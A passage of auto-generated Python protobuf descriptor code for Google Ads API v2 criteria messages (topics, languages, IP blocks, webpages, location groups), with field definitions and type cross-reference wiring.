name='path', full_name='google.ads.googleads.v2.common.TopicInfo.path', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7685,
serialized_end=7794,
)
_LANGUAGEINFO = _descriptor.Descriptor(
name='LanguageInfo',
full_name='google.ads.googleads.v2.common.LanguageInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='language_constant', full_name='google.ads.googleads.v2.common.LanguageInfo.language_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7796,
serialized_end=7867,
)
_IPBLOCKINFO = _descriptor.Descriptor(
name='IpBlockInfo',
full_name='google.ads.googleads.v2.common.IpBlockInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ip_address', full_name='google.ads.googleads.v2.common.IpBlockInfo.ip_address', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7869,
serialized_end=7932,
)
_CONTENTLABELINFO = _descriptor.Descriptor(
name='ContentLabelInfo',
full_name='google.ads.googleads.v2.common.ContentLabelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ContentLabelInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7934,
serialized_end=8036,
)
_CARRIERINFO = _descriptor.Descriptor(
name='CarrierInfo',
full_name='google.ads.googleads.v2.common.CarrierInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='carrier_constant', full_name='google.ads.googleads.v2.common.CarrierInfo.carrier_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8038,
serialized_end=8107,
)
_USERINTERESTINFO = _descriptor.Descriptor(
name='UserInterestInfo',
full_name='google.ads.googleads.v2.common.UserInterestInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_interest_category', full_name='google.ads.googleads.v2.common.UserInterestInfo.user_interest_category', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8109,
serialized_end=8189,
)
_WEBPAGEINFO = _descriptor.Descriptor(
name='WebpageInfo',
full_name='google.ads.googleads.v2.common.WebpageInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='criterion_name', full_name='google.ads.googleads.v2.common.WebpageInfo.criterion_name', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conditions', full_name='google.ads.googleads.v2.common.WebpageInfo.conditions', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8192,
serialized_end=8333,
)
_WEBPAGECONDITIONINFO = _descriptor.Descriptor(
name='WebpageConditionInfo',
full_name='google.ads.googleads.v2.common.WebpageConditionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operand', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.operand', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operator', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.operator', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='argument', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.argument', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8336,
serialized_end=8611,
)
_OPERATINGSYSTEMVERSIONINFO = _descriptor.Descriptor(
name='OperatingSystemVersionInfo',
full_name='google.ads.googleads.v2.common.OperatingSystemVersionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operating_system_version_constant', full_name='google.ads.googleads.v2.common.OperatingSystemVersionInfo.operating_system_version_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8613,
serialized_end=8714,
)
_APPPAYMENTMODELINFO = _descriptor.Descriptor(
name='AppPaymentModelInfo',
full_name='google.ads.googleads.v2.common.AppPaymentModelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.AppPaymentModelInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8716,
serialized_end=8827,
)
_MOBILEDEVICEINFO = _descriptor.Descriptor(
name='MobileDeviceInfo',
full_name='google.ads.googleads.v2.common.MobileDeviceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobile_device_constant', full_name='google.ads.googleads.v2.common.MobileDeviceInfo.mobile_device_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8829,
serialized_end=8909,
)
_CUSTOMAFFINITYINFO = _descriptor.Descriptor(
name='CustomAffinityInfo',
full_name='google.ads.googleads.v2.common.CustomAffinityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='custom_affinity', full_name='google.ads.googleads.v2.common.CustomAffinityInfo.custom_affinity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8911,
serialized_end=8986,
)
_CUSTOMINTENTINFO = _descriptor.Descriptor(
name='CustomIntentInfo',
full_name='google.ads.googleads.v2.common.CustomIntentInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='custom_intent', full_name='google.ads.googleads.v2.common.CustomIntentInfo.custom_intent', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8988,
serialized_end=9059,
)
_LOCATIONGROUPINFO = _descriptor.Descriptor(
name='LocationGroupInfo',
full_name='google.ads.googleads.v2.common.LocationGroupInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='feed', full_name='google.ads.googleads.v2.common.LocationGroupInfo.feed', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='geo_target_constants', full_name='google.ads.googleads.v2.common.LocationGroupInfo.geo_target_constants', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius', full_name='google.ads.googleads.v2.common.LocationGroupInfo.radius', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius_units', full_name='google.ads.googleads.v2.common.LocationGroupInfo.radius_units', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9062,
serialized_end=9338,
)
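# The assignments below resolve cross-references that the Descriptor blocks
# above left as None: wrapper-typed fields (StringValue, Int64Value, ...) get
# their message_type, enum-typed fields get their enum_type, and the
# ListingDimensionInfo 'dimension' oneof is stitched together from its member
# fields.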
_KEYWORDINFO.fields_by_name['text'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_KEYWORDINFO.fields_by_name['match_type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2._KEYWORDMATCHTYPEENUM_KEYWORDMATCHTYPE
_PLACEMENTINFO.fields_by_name['url'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPCATEGORYINFO.fields_by_name['mobile_app_category_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPLICATIONINFO.fields_by_name['app_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPLICATIONINFO.fields_by_name['name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONINFO.fields_by_name['geo_target_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2._DEVICEENUM_DEVICE
_PREFERREDCONTENTINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2._PREFERREDCONTENTTYPEENUM_PREFERREDCONTENTTYPE
_LISTINGGROUPINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2._LISTINGGROUPTYPEENUM_LISTINGGROUPTYPE
_LISTINGGROUPINFO.fields_by_name['case_value'].message_type = _LISTINGDIMENSIONINFO
_LISTINGGROUPINFO.fields_by_name['parent_ad_group_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGSCOPEINFO.fields_by_name['dimensions'].message_type = _LISTINGDIMENSIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'].message_type = _LISTINGBRANDINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'].message_type = _HOTELIDINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'].message_type = _HOTELCLASSINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'].message_type = _HOTELCOUNTRYREGIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'].message_type = _HOTELSTATEINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'].message_type = _HOTELCITYINFO
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'].message_type = _LISTINGCUSTOMATTRIBUTEINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'].message_type = _PRODUCTBIDDINGCATEGORYINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'].message_type = _PRODUCTCHANNELINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'].message_type = _PRODUCTCHANNELEXCLUSIVITYINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'].message_type = _PRODUCTCONDITIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'].message_type = _PRODUCTITEMIDINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_type'].message_type = _PRODUCTTYPEINFO
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'].message_type = _UNKNOWNLISTINGDIMENSIONINFO
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'])
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'])
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'])
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'])
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'])
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'])
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'])
_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_type'])
_LISTINGDIMENSIONINFO.fields_by_name['product_type'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'])
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGBRANDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELIDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELCLASSINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELCOUNTRYREGIONINFO.fields_by_name['country_region_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELSTATEINFO.fields_by_name['state_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_HOTELCITYINFO.fields_by_name['city_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGCUSTOMATTRIBUTEINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGCUSTOMATTRIBUTEINFO.fields_by_name['index'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2._LISTINGCUSTOMATTRIBUTEINDEXENUM_LISTINGCUSTOMATTRIBUTEINDEX
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['id'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['country_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTBIDDINGCATEGORYINFO.fields_by_name['level'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2._PRODUCTBIDDINGCATEGORYLEVELENUM_PRODUCTBIDDINGCATEGORYLEVEL
_PRODUCTCHANNELINFO.fields_by_name['channel'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2._PRODUCTCHANNELENUM_PRODUCTCHANNEL
_PRODUCTCHANNELEXCLUSIVITYINFO.fields_by_name['channel_exclusivity'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2._PRODUCTCHANNELEXCLUSIVITYENUM_PRODUCTCHANNELEXCLUSIVITY
_PRODUCTCONDITIONINFO.fields_by_name['condition'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2._PRODUCTCONDITIONENUM_PRODUCTCONDITION
_PRODUCTITEMIDINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTTYPEINFO.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PRODUCTTYPEINFO.fields_by_name['level'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2._PRODUCTTYPELEVELENUM_PRODUCTTYPELEVEL
_HOTELDATESELECTIONTYPEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2._HOTELDATESELECTIONTYPEENUM_HOTELDATESELECTIONTYPE
_HOTELADVANCEBOOKINGWINDOWINFO.fields_by_name['min_days'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELADVANCEBOOKINGWINDOWINFO.fields_by_name['max_days'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELLENGTHOFSTAYINFO.fields_by_name['min_nights'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELLENGTHOFSTAYINFO.fields_by_name['max_nights'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_HOTELCHECKINDAYINFO.fields_by_name['day_of_week'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2._DAYOFWEEKENUM_DAYOFWEEK
_INTERACTIONTYPEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2._INTERACTIONTYPEENUM_INTERACTIONTYPE
_ADSCHEDULEINFO.fields_by_name['start_minute'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2._MINUTEOFHOURENUM_MINUTEOFHOUR
_ADSCHEDULEINFO.fields_by_name['end_minute'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2._MINUTEOFHOURENUM_MINUTEOFHOUR
_ADSCHEDULEINFO.fields_by_name['start_hour'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADSCHEDULEINFO.fields_by_name['end_hour'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADSCHEDULEINFO.fields_by_name['day_of_week'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2._DAYOFWEEKENUM_DAYOFWEEK
_AGERANGEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2._AGERANGETYPEENUM_AGERANGETYPE
_GENDERINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2._GENDERTYPEENUM_GENDERTYPE
_INCOMERANGEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2._INCOMERANGETYPEENUM_INCOMERANGETYPE
_PARENTALSTATUSINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2._PARENTALSTATUSTYPEENUM_PARENTALSTATUSTYPE
_YOUTUBEVIDEOINFO.fields_by_name['video_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_YOUTUBECHANNELINFO.fields_by_name['channel_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_USERLISTINFO.fields_by_name['user_list'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_PROXIMITYINFO.fields_by_name['geo_point'].message_type = _GEOPOINTINFO
_PROXIMITYINFO.fields_by_name['radius'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_PROXIMITYINFO.fields_by_name['radius_units'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2._PROXIMITYRADIUSUNITSENUM_PROXIMITYRADIUSUNITS
_PROXIMITYINFO.fields_by_name['address'].message_type = _ADDRESSINFO
_GEOPOINTINFO.fields_by_name['longitude_in_micro_degrees'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_GEOPOINTINFO.fields_by_name['latitude_in_micro_degrees'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_ADDRESSINFO.fields_by_name['postal_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['province_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['country_code'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['province_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['street_address'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['street_address2'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_ADDRESSINFO.fields_by_name['city_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TOPICINFO.fields_by_name['topic_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TOPICINFO.fields_by_name['path'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LANGUAGEINFO.fields_by_name['language_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_IPBLOCKINFO.fields_by_name['ip_address'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CONTENTLABELINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2._CONTENTLABELTYPEENUM_CONTENTLABELTYPE
_CARRIERINFO.fields_by_name['carrier_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_USERINTERESTINFO.fields_by_name['user_interest_category'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_WEBPAGEINFO.fields_by_name['criterion_name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_WEBPAGEINFO.fields_by_name['conditions'].message_type = _WEBPAGECONDITIONINFO
_WEBPAGECONDITIONINFO.fields_by_name['operand'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2._WEBPAGECONDITIONOPERANDENUM_WEBPAGECONDITIONOPERAND
_WEBPAGECONDITIONINFO.fields_by_name['operator'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2._WEBPAGECONDITIONOPERATORENUM_WEBPAGECONDITIONOPERATOR
_WEBPAGECONDITIONINFO.fields_by_name['argument'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_OPERATINGSYSTEMVERSIONINFO.fields_by_name['operating_system_version_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_APPPAYMENTMODELINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2._APPPAYMENTMODELTYPEENUM_APPPAYMENTMODELTYPE
_MOBILEDEVICEINFO.fields_by_name['mobile_device_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CUSTOMAFFINITYINFO.fields_by_name['custom_affinity'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_CUSTOMINTENTINFO.fields_by_name['custom_intent'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['feed'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['geo_target_constants'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONGROUPINFO.fields_by_name['radius'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_LOCATIONGROUPINFO.fields_by_name['radius_units'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2._LOCATIONGROUPRADIUSUNITSENUM_LOCATIONGROUPRADIUSUNITS
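# Index every message descriptor on the file descriptor so that lookups by
# fully-qualified name (and the reflection machinery used below) can find them.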
DESCRIPTOR.message_types_by_name['KeywordInfo'] = _KEYWORDINFO
DESCRIPTOR.message_types_by_name['PlacementInfo'] = _PLACEMENTINFO
